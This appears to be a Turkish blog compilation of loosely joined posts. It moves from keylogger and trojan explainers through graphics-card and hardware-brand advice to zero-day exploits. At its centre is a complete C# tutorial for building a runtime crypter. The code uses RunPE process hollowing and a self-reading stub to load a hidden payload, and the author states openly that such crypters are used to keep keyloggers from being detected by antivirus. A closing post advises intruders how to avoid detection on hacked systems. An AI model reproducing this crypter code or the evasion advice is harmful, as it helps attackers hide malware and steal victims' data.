Bu yöntem ile bir çok banka, twitter, facebook ve instagram hesabı çalındı. En çok bu hesapları çalmaya yönelik saldırılar yapılıyor. Geçtiğimiz günlerde Phishing saldırıları ile bir çok ünlünün hesaplarını çalan bir çete siber suçlarla mücadele birimleri tarafından yakalandı. Eğer phishing saldırıları yapacaksanız bir daha düşünün derim. Siber suçlar bu işlere artık daha fazla özen göstermeye başladı.

Keylogger Nedir

Keylogger Nedir ?
Keylogger; kullanıcının klavyede dokunduğu tuşları kayıt eden programlardır. Keyloggerler genelde saldırı, casusuluk amaçlı kullanılır. Yani kötü amaçlı saldırgan kişi bizim bilgilerimiz ele geçirmeye çalışır. Bu tür programlar bizim klavyede hangi tuşa dokunuyorsak onları kayıt altına alır ve saldırgan kişiye (keyloggeri yapan kişi) bu kayıt ettiği tuşları e-posta yolu ile ulaştırır. Böylelikle bizim bütün özel bilgilerimiz o kişinin eline geçmiş oluyor. E-posta bilileri , kredi kartı bilgileri , dokümanlar , yazışmalar vb. gibi klavyede bastığımız her şeyi saldırgan kişiye iletir. Hakops Keylogger , Spyster , iSpyNow , Perfect Keylogger en çok kullanılan keyloggerlerdendir.

Keylogger Çeşitleri;
Yazılımla Çalışan Keylogger Çeşitleri;
Sisteminize yüklenmesiyle aktif hale gelen tuş takip programlarıdır, klavyenizde basılan her tuşu bir dosyaya kaydeder.

Donanımla Çalışan Keylogger Çeşitleri;
Bilgisayarınıza bir donanım eklemesiyle aktif hale gelen tuş takip cihazıdır , klavyenizde basılan her tuşu bir kalıcı bellek kartına yazılıma ihtiyaç duymadan kaydeder. ( klavye ile anakart arasına takılan küçük , Dikkatli bakılmadan görülemeyecek aparatlardır)

Güvenlik Amaçlı Keyloggerlar;
Genelde ebeveynlerin çocuklarını internet başındayken takip etmeleri için kullanılır ve tamamen sistem yöneticisinin bilgisi dahilindedir.
Keyloggerler Sistemimize Nasıl Girer ?
Kötü amaçlı saldırgan kişiler tarafından yazılan işletim sistemlerinin açıklarını kullanarak yazılır. Bu yazılan zararlı virüsü bir dosyanın içine gizleyerek bizlere atar. Biz de o dosyayı açtığımız an bilgisayarımda çalışmaya başlar.

Keyloggerlerden Korunma Yöntemleri Neler ?
1- Güncel işletim sistemleri kullanın.

2- Güncel bir Antivirüs programı kullanın.

3- Bankacılık işlemlerini güvenli olmayan bilgisayarlardan yapmayın ve ya yaparken ekran klavyesi kullanın.

4- Bilgisayarınıza bilmediğiniz dosyaları indirmeyin.

5- İndirdiğiniz dosyaları virüs total de taratın.



Bu güvenlik önemlerine dikkat ederseniz bilgisayarınızı koruma altına almış olursunuz.


Trojen Nedir?

Trojen nedir?
Trojen; Kötümcül bir bilgisayar yazılımı türüdür. Kullanıcıların isteği olmadan bilgisayarlarına bulaşırlar. Trojen bulaşan bir bilgisayar "zombie bilgisayar" diye tabir edilir. Trojen bulaşan bir bilgisayara her an uzaktan erişilebilir. Trojenler, Truva atı olarakta bilinmektedir. Trojenler çok çeşitli şekillerde bilgisayarlara bulaşabilirler. Trojenler resim gibi materyallerle birleştirilip kullanıcıya normalde bir resim dosyası gibi gözüken ama aslında bir trojen yazılımı olan resimleri göndererek kullanıcıları yanıltabilmektedirler. Bu yanılgıya kapılmamak için tanımadığınız 3. kişilerden aldığınız dosyaları açmadan önce uzantılarını kontrol ediniz.

Trojenler niçin kullanılır?
1- Trojenler bilgisayarları zombie bilgisayara çevirmek için kullanılırlar. Zombie bilgisayarlar sayesinde ddos saldırıları yapılabilmektedir.

2- Banka bilgilerini çalmak için kullanılabilirler,

3- Önemli bilgilerinizi çalmak için kullanılabilirler,

4- Önemli dosya ve bilgilerinizi çalmak için kullanabilirler,

5- Önemli kişlerle yaptığınız görüşmelerinizi izleyebilir ve kayıt altına alabilirler.

6- Bilgisayarınızın ekran görüntüleri kayıt edilebilir.

Trojenler hangi yollarla bilgisayarınıza bulaşabilir?
1- E-posta yoluyla

2- İnternet siteleri aracılığıyla

3- illegal Yazılımlar aracılığıyla

4- İllegal oyunlar aracılığıyla

5- Crack vb. illegal yazılım kırma araçlarıyla

Bilgisayarıma trojen bulaşmasını nasıl engellerim?
1- Öncelikle antivirüs programınızı legal yollardan edinmelisiniz. Antivirüsünüzü devamlı güncel tutmalısınız.

2- Bilgisayarınıza illegal yazılımlar yüklemeyiniz.

3- Crack vb. yazılım etkinleştirici uygulamalardan uzak durunuz.

4- E-posta ile gelen her linke tıklamayanız.

5- Deep freeze benzeri yazılımlar kullanarakta kendinize tam koruma sağlamış olursunuz.

6- İmzasız sürücüler yüklemeyeniz.

7- Başkalarından aldığınız Resim vb. gibi dosyaları çalıştırmadan önce dosyanın uzantılarını kontrol ediniz.

8- Bilgisayarınızdaki cookieleri, geçmiş klasörlerini devamlı temizleyiniz.

9- Firewall kullanınız.

Trojen bulaşmış bilgisayarımı nasıl temizleyebilirim?
Bilgisayarınıza hangi trojen'in bulaşmasına bağlı olarak temizleme işlemleride farklı olmaktadır. Trojen'i temizlemek çok kolay olmamaktadır. Acemi kullanıcılariçin en garantili temizleme yöntemi disk'e format atmaktır. Profesyonel kullanıcılar için ise öncelikle bilgisayar güvenli modda başlatılmalı ve trojen temizleyici yazılımlarla trojen temizlenip bilgisayarın kararlılığı denetlenmelidir.

Trojen yazılımlarına örnekler
1- Netbus

2- Turkojan

3- Backorifice

4- Dark Comet

5- Netbuster

Trojen temizleyici yazılımlara örnek
1- Combofix

2- Emsisoft Anti-Malware

3- Malwarebytes Anti-Malware

4- PC Tools ThreatFire

5- SUPER AntiSpyware

crypter Nedir?

Crypter Nedir?
Crypter, temel olarak şifreleyici anlamına gelmektedir ve programları şifreleme görevini üstlenirler. Genel olarak kullanım amaçları yazılmış olan bir programın decompile edilmesini önlemek, yada yazılımın başka yazılımlar ve insanlar tarafından tespit edilmesini önlemektir. Günümüzde Bizler Bu Tür Şeyleri Keylogger üzerinden kullanıp anti vürüslere takılmasını önlüyoruz.

Crypterlar 2 parçadan oluşurlar;

Client
Stub
Client
Client, şifrelenecek olan yazılımı stub içerisine enjekte ederek, yazılımın bu stub üzerinde çalışmasını sağlar.

Stub

Kelime anlamı olarak maske demektir. Şifrelenecek olan yazılımı sararak gizler. Çalıştırıldığında zararlı yazılımı memorye yükler.

Crypterlar çalışma şekillerine göre ikiye ayrılırlar;

Scantime Crypter
Runtime Crypter
Scantime Crypter
Bu tarz crypter ile şifrelenen yazılımlar, stub çalıştığı anda önceden belirlenmiş bir dizine çıkartılırlar. Bu yöntemde, stub çalışmadan önce yazılım tespit edilemez. Fakat stub çalıştıktan sonra yazılım export edileceğinden ilgili dizin kontrol edildiğinde tespit edilebilmektedir.

Runtime Crypter
Bu yöntem ile şifrelenen yazılım herhangi bir dizine çıkarılmadan direkt olarak memorye yüklenir ve çalıştırılır. Bu şekilde şifrelenen bir yazılımın ilkel yöntemlerde tespit edilmesi imkansızdır. Memory analizi ve dinamik analiz yapılması gerekir. Bu dokümanda Runtime Crypter yapımı anlatılacaktır.

Runtime crypterların en önemli kısmı RunPE (hafızadan process çalıştırma) modülüdür. Bu modül yazılımımız için memory allocation işlemlerini yapacak ve yazılımı bu alana map edecektir. Windows platformlarda bu işlemler kernel32.dll ve ntdll.dll modülleri ile yapılmaktadır. Öncelikli olarak bu modüllerde kullanmış olduğumuz fonksiyonları inceleyelim.

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll", CharSet = CharSet.Unicode)]
private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref hesap.STARTUP_INFORMATION startupInfo, ref hesap.PROCESS_INFORMATION processInformation);
SuppressUnmanagedCodeSecurity : CLR (Common Language Runtime) çalışırken bir takım güvenlik prosedürleri çalıştırır. Bu prosedürler unmanaged kodun çalışması sırasında kısıtlamalar getirir. Kernel32 fonksiyonunu çağırmadan önce bu attribute’u eklediğimizde güvenlik prosedürleri baskılanarak kodun çalışması sağlanır.

CreateProcess : Parametre olarak application name ve command line stringlerini alır. Sonraki iki parametre process ve thread security attribute’larıdır.Oluşacak childların erişimini belirler. Beşinci parametre oluşan yeni prosesin prosesi oluşturan prosesden kalıtım(inherit) yapıp yapamayacağını belirler. Daha sonra creationFlag yani oluşacak yeni prosesin hangi modda oluşacağını belirleyen parametre yer alır. Sonraki iki parametre prosesin çalışacağı environment bilgileri ve dizin bilgileri belirtir. Son iki parametre ise startup ve proses bilgilerini barındırır.

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool GetThreadContext(IntPtr thread, int[] context);
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool Wow64GetThreadContext(IntPtr thread, int[] context);
GetThreadContext : Birinci parametrede verilen threadin context’ini, ikinci parametrede verilen array’e kaydeder.

Wow64GetThreadContext : GetThreadContext fonksiyonunun 64 bit versiyonudur.

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool SetThreadContext(IntPtr thread, int[] context);
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool Wow64SetThreadContext(IntPtr thread, int[] context);
SetThreadContext : İkinci parametrede verilen byte arrayı, ilk parametrede verilen threadin contexti olarak atar.

Wow64SetThreadContext : SetThreadContext fonksiyonunun 64 bit versiyonudur.

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
ReadProcessMemory : İlk parametre olarak aldığı prosese ait memorynin ikinci parametrede aldığı adresden itibaren dördüncü parametre kadar alanı okur okunan bufferı üçüncü parametreye okunan byte sayısını beşinci parametreye aktarır.

WriteProcessMemory : İlk parametre olarak aldığı prosese ait memorynin ikinci parametrede aldığı adresinden itibaren üçüncü parametredeki verileri dördüncü parametre kadarlık alana yazar beşinci parametreye kaç byte yazdığını döndürür.

[SuppressUnmanagedCodeSecurity]
[DllImport("ntdll.dll")]
private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress);
NtUnmapViewOfSection : Ntdll.dll modülünün içinde bulunur. Prosese ait view alanını boşaltır.

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
VirtualAllocEx : Belirtilen işleme sanal bellek alanı  tahsis edilir. İlk parametre prosesi, ikinci parametre tahsis edilecek memory’nin adresini (Boş bırakılırsa uygun bir adres sistem tarafından belirlenir.), üçüncü parametre kaç byte’lık alanın tahsis edileceğini, dördüncü parametre memory allocation tipini (mem_commit | mem_reserved), beşinci parametre memory erişim iznini belirler (execute, read, write).

[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll")]
private static extern int ResumeThread(IntPtr handle);
ResumeThread : Askıya alınmış olan thread tekrardan aktif hale getirilir.

API fonksiyonlarını classımızın en başında tanımlıyoruz. Daha sonra HandleRun adında bir method oluşturuyoruz. Yapmamız gereken ilk iş bir proses oluşturmak. Prosesi oluşturduktan sonra payloadımızda bazı headerları kontrol etmemiz gerekiyor. Bunun için öncelikle Microsoft PE (Portable Executable) dosya yapısını inceleyelim.

Microsoft PE Dosya Yapısı

DOS Header
PE Signature
COFF Header
Optional Header
Section Table
Mappable Sections

MZ header olarakda geçmektedir. İlk iki byte MZ karakterleridir ve  Microsoft executable mimarisini oluşturan Mark Zbikowski’nin adından gelmektedir. Bütün dosya formatlarında ilk bytelar signature yada magic number olarak adlandırılan formatı belirleyen bytelardır. Bu header içerisinde bulunan değerlerin birçoğu günümüz mimarisinde kullanılmamaktadır. Fakat eski programların çalışabilmesi için ve yeni bir mimarinin çok maliyetli olmasından dolayı Dos Header hala bulunmaktadır. Ayrıca içerisindeki minalloc maxalloc parametreleri minimum ve maksimum memory tahsis miktarının belirler. Bu headerın son 4 byte’ı olan e_lfanew PE headerın başlangıç offsetini gösterir. PE headerın devamında COFF (Common Object File Format) Header bulunmaktadır.Dos Header

PE/COFF Header

PE header sadece 4 bytelık bir veri içerdiğidinden COFF header ile birlikte ele alınırlar. PE header  “PE\0\0”  degerini barındırır. Hemen ardından COFF header bölümü başlar ve içerisindeki değerler sırasıyla şu şekildedir: 2 byte Machine, 2 byte NumberOfSections, 4  byte TimeDateStamp, 4  byte PointerToSymbolTable, 4  byte NumberOfSymbols, 2 byte SizeOfOptionalHeader , 2 byte Characteristics.

Machine : Dosyanın derlendiği mimariyi belirtir.

NumberOfSections : Bölüm sayısını belirtir.

TimeDateStamp : Dosyanın derlendiği tarih ve saati belirtir.

PointerToSymbolTable : Sembol tablosunu gösterir.

NumberOfSymbols : Sembol tablosundaki sembol sayısını verir.

SizeOfOptionalHeader : PE Optional Header boyutunu belirtir.

Characteristics : Dosyanın exe, dll, çalışma zamanı özellikleri ile bilgileri içerir.

PE Optional Header

İsminde optional geçse de özü itibariyle opsiyonel değildir. PE dosyasının olmazsa olmazlarındandır. Lakin COFF içerisinde değildir. İçerisinde işletim sistemi versiyonundan kod boyutuna kadar birçok bilgi barındırır. Biz burada hepsini değil sadece işimize yarayacak olan değerleri açıklayacağız.

ImageBase :  Proses hafızaya yüklendiğinde ilk byte’ın tercih edilen adresini belirtir.

AddressofEntryPoint : Programın başlangıç noktasını belirtir. Bu nokta aynı zamanda .text section’nı işaret eder.

SizeofImage : Binary dosyayının boyutunu belirtir.

SizeofHeaders : Headerların toplam boyutunu verir.

Section Table

Bölüm başlıkları PE dosyasının bölümlerine ilişkin bilgileri tutmaktadır. Bölümlerin isimleri, nereden başladıkları, ne uzunlukta oldukları gibi bilgiler bölüm başlıklarında bulunurlar. Bölüm tablosu hemen PE Optional Header’dan sonra gelmektedir. Çalıştırılabilen PE dosyalarında bölümlerin RVA'ları bağlayıcılar tarafından PE dosyası içerisine küçükten büyüğe doğru ve ardışıl olarak yerleştirilirler. Bölüm başlıkları 40 byte uzunluğunda olan IMAGE_SECTION_HEADER yapısıyla temsil edilmektedir. Başlıca birkaç section şöyledir:

.text : Programın kod kısmıdır.

.data : Global değişkenler tutulur.

.bss : Initialize edilmemiş değişkenler tutulur.

.idata : Import, export tablosu tutulur.

.rsrc : Resim vb. kaynaklar tutulur.

.reloc : Relocation verisi tutulur.

Devamında Sectionlar bulunmaktadır. Şimdilik bu kadar teorik bilginin yeterli olduğunu düşünüyorum artık uygulamaya geçebiliriz.

Öncelikle payloadımızın e_lfanew değerini kontrol ederek PE headerın başlangıç değerini buluyoruz. Bu değeri diğer bütün header bilgilerini bulurken referans olarak kullanacağız. İlerde kullanmak üzere ImageBase değerini de şimdiden çekiyoruz.

int num2 = BitConverter.ToInt32(data, 60);// PE HEADER pointer
int num3 = BitConverter.ToInt32(data, num2 + 52);//ImageBase
Prosesin birincil thread’inin içeriğini okuyoruz. Bu içeriğin 41. byte bize thread’in stack pointerını, 44. byte  program counterı vermektedir. Birincil thread de doğrudan bizim payloadı çalıştıracağından bu değerleri daha sonra değiştireceğiz.

if (IntPtr.Size == 4)
{
  if (!hesap.GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
  {
    throw new Exception();
  }
}
else if (!hesap.Wow64GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
  throw new Exception();
}
Thread’in stack pointerından stack’in adresini okuyoruz. Bu okuduğumuz adres stub’ın adresi olmakla beraber eğer payload’ın ImageBase’i ile çakışıyorsa stub’ın hafıza alanını boşaltıyoruz.

if (!hesap.ReadProcessMemory(pROCESS_INFORMATION.ProcessHandle,num4+8,ref num5, 4, ref num))
{
  throw new Exception();
}               
if (num3 == num5)
{
  if(hesap.NtUnmapViewOfSection(pROCESS_INFORMATION.ProcessHandle, num5) != 0)
  {
    throw new Exception();
  }
}
Daha sonra payloadın SizeofImage değerini ve SizeofHeaders değerini öğrenerek payloadın boyutu kadar sanal bellek alanı oluşturuyoruz. Ardından header bilgilerini doğrudan bu alana yazıyoruz.

int length = BitConverter.ToInt32(data, num2 + 80); //SizeofImage
int bufferSize = BitConverter.ToInt32(data, num2 + 84);//SizeofHeaders                           
int num6 = hesap.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, num3, length, 12288, 64);
if (!compatible && num6 == 0)
{
  flag = true;
  num6 = hesap.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
  throw new Exception();
}
if (!hesap.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num))
{
  throw new Exception();
}
Header bilgilerini yazdıktan sonra sıra sectionları yazmaya geldi bunun için öncelikle section tablosunun başlangıç offsetini ve kaç adet section olduğunu öğreniyoruz. Ardından her sectionı sırayla sanal bellek alanına ekliyoruz.

int num7 = num2 + 248;//Section table başlangıç offseti
short num8 = BitConverter.ToInt16(data, num2 + 6);//NumberofSection
for (int i = 0; i <= (int)(num8 - 1); i++)
{
  int num9 = BitConverter.ToInt32(data, num7 + 12);//Section Virtual Address
  int num10 = BitConverter.ToInt32(data, num7 + 16);//Section Raw Size
  int srcOffset = BitConverter.ToInt32(data, num7 + 20);//Section Raw Address
  if (num10 != 0)
  {
    byte[] array2 = new byte[num10];
    Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
    if (!hesap.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
    {
      throw new Exception();
    }
  }
num7 += 40;
}
Oluşturulan sanal belleği fiziksel belleğe kopyalıyoruz ve payloadın AddressofEntryPoint adresini birincil thread’in program counterına atıyoruz.

byte[] bytes = BitConverter.GetBytes(num6);
if (!hesap.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num4 + 8, bytes, 4, ref num))
{
  throw new Exception();
}
int num11 = BitConverter.ToInt32(data, num2 + 40); //AddressofEntryPoint
if (flag)
{
  num6 = num3;
}
array[44] = num6 + num11;
if (IntPtr.Size == 4)
{
  if (!hesap.SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
  {
    throw new Exception();
  }
}
else if (!hesap.Wow64SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
  throw new Exception();
}
İlk başta suspend modda açmış olduğumuz prosesi aktif hale getiriyoruz ve çalışmasına devam etmesini sağlıyoruz.

if (hesap.ResumeThread(pROCESS_INFORMATION.ThreadHandle) == -1)
{
  throw new Exception();
}
Herhangi bir hata oluşursa programın sonlandırılması için try/catch bloğu içine alıyoruz ve programı sonlandırıyoruz.

Process processById = Process.GetProcessById(Convert.ToInt32(pROCESS_INFORMATION.ProcessId) );
  if (processById != null)
{
  processById.Kill();
}
Oluşturacak olduğumuz crypterın RunPE kodları bu kadar. Payload da stub’ın kendi üzerinde bulunacağından küçük bir binary parser da eklememiz gerecek.

static void Main()
{
  string owntext = File.ReadAllText(System.Reflection.Assembly.GetEntryAssembly().Location);
  string[] ayrac = { "..OO.PP.SS.." };
  string[] payloadRes = owntext.Split(ayrac, StringSplitOptions.None);
  byte[] payload = StringToByteArray(payloadRes[1]);
  for (int i = 1; i <= 5; i++)
  {
    if (hesap.HandleRun ( System.Reflection.Assembly.GetEntryAssembly().Location, "", payload, false))
    {
      break;
    }
  }
}
public static byte[] StringToByteArray(String hex)
{
  int NumberChars = hex.Length;
  byte[] bytes = new byte[NumberChars / 2];
  for (int i = 0; i < NumberChars; i += 2)
    bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
  return bytes;
}
Kısaca bu kodu da açıklamak gerekirse öncelikle program kendi kendisini okuyor. Daha sonra okunan bu stringi ayraç olarak belirlenen karakter dizisinden itibaren ayırıyoruz. Elde ettiğimiz stringi byte’a dönüştürdükten sonra RunPE kodumuzu yazarken tanımladığımız HandleRun fonksiyonuna programın kendisi ile birlikte parametre olarak veriyoruz.

Bütün bu işlemleri yaptıktan sonra crypterımız kullanıma hazır. İsterseniz daha da geliştirmek için encryption,encoding gibi özellikler ekleyebilirsiniz. Stubın üzerine payloadı isterseniz herhangi bir hex editör yardımı ile elle ekleyebilir, isterseniz bunu sizin yerinize yapan bir Client programını yazabilirsiniz.

İyi Bir Ekran Kartı Nasıl Olmalıdır

Herkesin sorduğu sorulardan birisidir ki “İyi bir ekran kartı nasıl olmalıdır“? Donanım teknolojileri her geçen gün o kadar ciddi bir şekilde gelişiyor ki gerçekten hızına yetişmek son derece zor ve insanların bu anlamda çok daha iyi bir şekilde fikir sahibi olması gerekiyor. Türkiye, zaman içerisinde dünyanın en önemli bilgisayar merkezlerinden birisi oldu ve artık markalar yeni geliştirdikleri ürünleri ilk olarak ülkemize göndererek kullanıcıların yorumlarına göre çok daha kaliteli modeller üzerinde çalışmalar yapabiliyorlar. Ekran kartı, bir bilgisayarın en önemli parçalarından birisi olarak dikkat çeker ve özellikle gençler için çok önemlidir.

İyi bir ekran kartı nasıl olmalıdır? Bu sorunun yanıtını aslında bulmak çok da zor değil. Bildiğimiz gibi günümüz oyunlarında ve videolarında o kadar gelişmiş görüntü kalitesi kullanılıyor ki bu görüntü kalitesine birebir uygun şekilde performans verecek ekran kartı modellerini tercih etmek gerekiyor. Zaman içerisinde ekran kartı satışlarında da en etkin ülkelerden birisi olmayı başardık.

İyi Bir Ekran Kartı Nasıl Olmalıdır

Ekran kartı seçimi konusunda son derece dikkatli seçim yapmak gerekiyor ancak hafıza ve bit anlamında muazzam seçenekler tercih edilmelidir. Şuan için ekran kartı görüntü kalitesi konusunda en iyi seçenekler birçok farklı marka yardımı ile bize sunulması gerekiyor. Ekran kartı ile alakalı kavramları inceleyelim.

BİT: Ekran kartının renk kalitesi ile alakalı detaylar anlamına gelir. Bit ne kadar yüksek ise renklerden o kadar kaliteli bir şekilde çözünürlük kalitesi elde etmek mümkün hale gelir. En düşük 128 bit olması günümüz oyunlarını oynamanız için yeterli olur ancak 256 ve 512 bit seçenekleri ultra kalite anlamına gelir.

BELLEK: Bir ekran kartının hafızası ne kadar fazla olursa o kadar iyi olacaktır ve oyun performanslarını kendi içerisinde o kadar iyi bir şekilde ayarlar. 2 GB veya 4 GB en ideal seçenektir.

FAN: Ekran kartı üzerinde ne kadar soğutucu var ise sorun yaşamanız o kadar ileri seviyeye sarkar. Bu da demek oluyor ki çift fanlı ekran kartlarını tercih edin.

DDR: Yeni nesil donanım teknolojileri DDR ile hesaplanır. DDR3 ve üzeri ekran kartları yeni nesil anlamına gelir.



En İyi Bilgisayar Donanım Markaları

Bilişim sektörü kapsamında incelediğimizde bilgisayar teknolojileri o kadar ciddi bir hız ile gelişme gösteriyor ki bunu takip etmek neredeyse imkansız. Özellikle son birkaç sene içerisinde yaşanan gelişmeleri incelediğimizde teknolojinin de getirileri sayesinde markalar, inanılmaz ürünler ortaya çıkararak bu ürünlerin çok kısa bir zaman içerisinde popülerlik düzeyi anlamında çok daha ciddi noktalara ulaşmasını sağlıyor. Bilgisayar, bildiğimiz üzere performans ile ilgili değerlendirmeler yapılabilmesi için donanımlar sayesinde var olan komplike bir toplama yapıdır.

Bir bilgisayarın olmazsa olmazı donanımlardır. Yazılımlar olmadan da donanımları çalıştırmak mümkündür ancak donanım olmadan bilgisayar diye bir olgunun olmayacağını da iyi bir şekilde idrak etmek gerekiyor. Ülkemizde özellikle son birkaç sene içerisinde bilgisayarın gelişmiş düzeyi de çok önemlidir. Şimdi sizleri donanım olarak en iyi markalar konusunda bilgilendirecek ve bir bilgisayar toplarken hangi markalar tercih edilmeli, bununla ilgili fikir sahibi yapacağız.

En İyi Bilgisayar Donanımı Markaları
Bilgisayar donanımları anlamında üretim yapan her geçen gün farklı firmaların ve markaların ortaya çıktığını söyleyebiliriz. Bu firmalar, zaman içerisinde yaptıkları kaliteli donanımlar sayesinde çok daha ön planda olabilirler. Ancak dünya genelinde olmazsa olmaz noktasına gelmiş bazı bilgisayar donanımı markaları vardır. Ne kadar iyi bilirseniz bilin. Mutlaka kendinize “Bilgisayar toplarken hangi markalar tercih edilmeli” sorusunu sormuşsunuzdur ve en iyi bilgisayar donanımı markaları ile ilgili düşünceleriniz oluşmuştur.

Bilişim Cafe ekibi olarak bu anlamda sizleri donanım donanım ayırarak en iyi markaları sırası ile yazacak ve bilgi sahibi olmanıza da yardımcı olacağız. Bu markalar, sizlere birçok farklı anlamda fayda sunacaktır.

En İyi Bilgisayar Markaları: Apple, HP, Asus, Acer

En İyi Ekran Kartı Markaları: Nvidia GeForce, ATI Radeon, Gigabyte, MSI, Sapphire

En İyi İşlemci Markaları: İntel, AMD

En İyi Anakart Markaları: Asus, MSI, Gigabyte

En İyi Harddisk Markaları: Seagate, WD

En İyi Ses Kartı Markaları: Asus, Realtek

1 Ekim 2018 Pazartesi

zer0day exploit


Zero Day, Türkçe karşılığı ise sıfırıncı gün açığı. Genelde hacker’lar arasında “0day” veya “zer0day” diye geçmektedir. Herhangi bir sistem veya uygulama için yazılan exploitler güvenlik platformlarında paylaşılır ve ilgili sistem/uygulama geliştiricileri, yayınladıkları yamalarla açığı kapatırlar. Bir sistemde/uygulamada tespit edilen bir açığa, çok kısa bir süreçte yazılan exploitlere de 0-Day Exploit adı verilir. 0-Day Exploitler henüz ilgili sistemde/uygulamada yama çıkarılmadan yayınlandığı için tehlikeli olabilmektedirler.
NOT: Bu exploitlerin %95’inden fazlası ücretlidir.
Genelde zaman açısından bakıldığında aşamalar aşağıdaki gibi:

1-> Sistemde/uygulamada bir güvenlik açığı tespit edilir.
2-> Bu zafiyetten sistemi/uygulamayı sömürmek için bir exploit yazılır.
(Genelde exploitler C, Perl, Python, Ruby gibi dillerle yazılmaktadır.)
3-> Exploit aktif halde insanların kullanımına açılır.
(Not kısmında belirttiğim gibi Zer0day exploitleri genelde para karşılığında kullanabilirsiniz.)
4-> Sistem/Uygulama yöneticisi zafiyetin farkına varır durumun ciddiyetini anlar ve hemen zafiyeti gidermek amacıyla bir paket yayınlar böylelikle zafiyeti etkisiz kılmayı amaçlar.
(2006’da yayınlanan bir rapora göre ortalama 28 günde zafiyet giderilir, tabi bu sistem yöneticilerinin de bu işi ne kadar ciddiye aldıklarına bağlı olarak süre uzayıp kısalabilir.)
5-> Artık zafiyet kapanmış durumdadır ve exploit etkisiz hale gelmiştir.

Zer0day başlığı altında karşımıza birçok kez çıkan standart bir örnek ile konuyu pekiştirelim.
Heartbleed güvenlik açığı 2014 yılının Nisan ayında tespit edilen bir güvenlik zafiyetiydi. Çoğu sunucunun kullandığı açık kaynak kodlu OpenSSL kütüphanesinde bulunan güvenlik açığı sayesinde saldırgan; yetkisi olmadığı halde aynı sunucudaki diğer kullanıcıların kredi kartı gibi özel bilgilerine erişebiliyordu. Bu güvenlik zafiyeti keşfedilir edilmez “OpenSSL Zero Day Vulnerability” diye duyuruldu. Biz bunu gerçekten “sıfıncı gün açığı” olduğunu sanıp hemen OpenSSL kullanan sunucularımıza koşmuştuk, ancak ABD Ulusal Güvenlik Dairesi (NSA)’nden ayrılan 2 muhbir özel bir televizyon kanalına verdikleri demeçte, bu güvenlik zafiyetinin NSA tarafından uzun süredir bilindiğinden ve bilerek yayınlanmadığından bahsettiler.

exploit nedir

Exploitlerin Çeşitleri Nelerdir?

Remote Exploits

Adından da anlaşılacağı gibi uzak sistemlere yapılan sömürme işlemlerini bu exploitler sayesinde yaparız.
Yukarıda gördüğünüz gibi “sqlmap” aracıyla uzak sisteme sql açığı üzerinden exploitleme yapılarak veritabanı üzerindeki bir veri listelenmiştir.

Local Exploits

Local exploitler sistemde direkt olarak çalışabilen exploitlerdir. Genelde sistemde rütbe, hak yükseltme işlemlerinde kullanılır.

Yukarıda gördüğünüz exploit Linux 2.6.23 sistemde root yetkisine sahip olmak amacıyla yazılmıştır.

Zero-day Exploits

Zero-day exploitler; sistemde açığın bulunduğu anda yazılan exploitlerdir. Diğer exploit çeşitlerine göre daha tehlikelidir. Tehlikeli olmasının sebebi, sistem yöneticileri gibi sistem sahiplerinin açıktan haberdar olmamasıdır. Bu exploitlerin %95’inden fazlası ücretlidir.

25 Eylül 2018 Salı

NİRVANA

BASLIGIMIZIN ADI NIRVANA.BUGUN BASINIZI AGRITMAYACAK HAFIF BIR DERSIMIZ VAR.HACK KURSU GORUPTE BASI AGRIMAMAK,NIRVANAYI BULMAK DEMEKTIR.TADINI CIKARIN VE DOLAPTAN SOGUK BIR BIRA ALIP OKUMAYA BASLAYIN...SIMDI BIR SISTEME KAPAGI ATTIGIMIZDA KAPI DISARI ATILMAMAMIN YONTEMLERINI GORELIM;
1) ONCELIKLE ESEGIN SEYINE SU KACIRMAYACAKSINIZ YANI CIVITMAYACAKSINIZ.SISTEM YONETICISI BIR GECEDE 100 KEZ BAGLANAN BIR HERIF GORURSE EMIN OLUN ARASTIRACAKTIR.YAVUZ HIRSIZ EV SAHIBINI BASTIRIR LAFINA PEK GUVENMEYIN.HACK OLAYINDA,EV SAHIBI MERMIYI SAKINMAZ...
2) HACKLEDIGINIZ SISTEMDE,GECE YATISINA GELMIS AMA MERAMINI ANLATAMAYAN MISAFIR GIBI SAATLERCE OYALANMAYIN.ENSELENIRSINIZ.ISINIZI GORUN VE UZAYIN.
